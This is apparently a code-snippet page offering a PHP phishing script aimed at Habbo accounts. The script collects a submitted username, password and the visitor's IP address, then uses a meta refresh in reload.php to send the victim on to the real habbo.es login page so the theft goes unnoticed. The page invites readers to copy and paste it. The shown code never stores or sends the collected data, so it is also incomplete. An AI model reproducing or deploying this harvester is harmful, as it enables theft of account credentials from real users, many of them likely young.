/ Published in: PHP
                    
                                        
                            
                                Expand |
                                Embed | Plain Text
                            
                        
                        Copy this code and paste it in your HTML
 <?php $content .= " Account: " . $_POST['login-username'] . " "; $content .= " Password: " . $_POST['login-password'] . " "; $content .= " IP: " . $_SERVER['REMOTE_ADDR'] . " "; include ("reload.php"); ?> -------------------------------------------------------------------------------------------- reload.php: <head> <meta http-equiv="refresh" content="0;url=https://www.habbo.es/account/submit"/> </head>
Comments
                    Subscribe to comments
                
                